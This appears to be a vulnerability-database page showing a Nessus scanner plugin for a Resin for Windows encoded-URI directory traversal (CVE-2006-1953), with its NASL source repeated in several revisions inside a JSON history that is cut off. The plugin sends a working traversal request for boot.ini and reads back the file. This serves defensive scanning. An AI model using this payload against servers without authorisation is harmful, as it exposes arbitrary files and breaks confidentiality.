Search...

Resin for Windows Encoded URI Traversal Arbitrary File Access

2006-05-27T00:00:00

ID RESIN_DIR_TRAVERSAL.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host is running Resin, an application server.

The installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(21606);
  script_version("1.23");
  script_cvs_date("Date: 2018/11/15 20:50:25");

  script_cve_id("CVE-2006-1953");
  script_bugtraq_id(18005);

  script_name(english:"Resin for Windows Encoded URI Traversal Arbitrary File Access");
  script_summary(english:"Tries to retrieve boot.ini using Resin");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to directory traversal attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Resin, an application server.

The installation of Resin on the remote host allows an unauthenticated
remote attacker to gain access to any file on the affected Windows
host, which may lead to a loss of confidentiality.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434150/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"http://www.caucho.com/download/changes.xtp");
  script_set_attribute(attribute:"solution", value:"Upgrade to Resin 3.0.19 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/27");
  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/16");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:caucho:resin");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8080);
  script_require_keys("www/resin");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:8080);


# Unless we're paranoid, make sure the banner is from Resin.
if (report_paranoia &lt; 2)
{
  banner = get_http_banner(port:port);
  if (!banner) exit(1, "Unable to get the banner from web server on port "+port+".");
  if ("Resin" &gt;!&lt; banner) exit(1, "The web server on port "+port+" does not appear to be Resin.");
}


# Try to exploit the issue to get a file.
file = "boot.ini";
u = string("/C:%5C/", file);
r = http_send_recv3(method:"GET",item:u, port:port, exit_on_fail:TRUE);

# There's a problem if looks like boot.ini.
if ("[boot loader]"&gt;&lt; r[2])
{
  if (report_verbosity &gt; 0)
  {
    report = '\n' +
"Nessus was able to retrieve the contents of '\boot.ini' using the" + '\n' +
'following URL :\n' +
'\n' +
'  ' + build_url(port:port, qs:u) + '\n';

    if (report_verbosity &gt; 1)
      report += '\nHere is its contents :\n\n' + r[2] + '\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}

JSON Vulners Source

Initial Source

{"id": "RESIN_DIR_TRAVERSAL.NASL", "bulletinFamily": "scanner", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.", "published": "2006-05-27T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "reporter": "Tenable", "references": ["https://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "cvelist": ["CVE-2006-1953"], "type": "nessus", "lastseen": "2019-01-16T20:06:38", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 1, "enchantments": {}, "hash": "c93d3b658f450eaf7aee9738a199dcf838bc7d5242533a8ac3dd529a24e02701", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "ae30ab679a4620946e7383f6006ba3c5", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "43a9587541518ac9911b427a02fc78b2", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2016-09-26T17:26:03", "modified": "2016-05-16T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2016/05/16 14:22:07 $\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n script_osvdb_id(25570);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 6, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "c8d78dafe2d79e0fcde5a7b257542edbfc6215a30e2539b86ba49451428096b6", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}, {"hash": "8e42d3c54b9b50456eedee858f471fbf", "key": "sourceData"}, {"hash": "79a3d069e1f4328741af17d3fccf32cd", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-11-17T03:11:56", "modified": "2018-11-15T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["https://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-17T03:11:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 3, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "b79374dd28ba9cc78d9fcaa95cfe0cd813d0d73bd315bc30ccb5bbd6047a9c8c", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-07-30T14:16:41", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-30T14:16:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "532cc1f2321277ab27e9eb978a647c0316dd88af739d2c3361f01b9da47e58d8", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "ae30ab679a4620946e7383f6006ba3c5", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}, {"hash": "43a9587541518ac9911b427a02fc78b2", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2017-10-29T13:43:25", "modified": "2016-05-16T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2016/05/16 14:22:07 $\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n script_osvdb_id(25570);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:43:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 5, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "b79374dd28ba9cc78d9fcaa95cfe0cd813d0d73bd315bc30ccb5bbd6047a9c8c", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-09-02T00:03:11", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 